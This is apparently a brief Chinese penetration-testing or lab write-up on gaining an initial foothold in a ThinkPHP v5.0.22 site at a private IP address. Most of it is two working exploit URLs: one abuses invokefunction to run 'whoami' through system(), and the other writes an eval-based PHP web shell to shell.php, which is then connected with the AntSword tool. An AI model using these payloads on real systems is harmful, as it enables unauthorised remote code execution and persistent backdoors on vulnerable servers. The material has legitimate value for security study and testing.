外网打点 访问目标IP发现时ThinkPHP框架,经过报错测试发现版本号为v5.0.22,是存在漏洞的版本。百度寻找相关的漏洞去利用。 Payload http://192.168.111.31/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 成功RCE 找能够getshell的漏洞利用点。 Payload http://192.168.111.31/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][2]=%3C?=%20eval($_POST[%271%27]);phpinfo();%20?%3E 蚁剑连接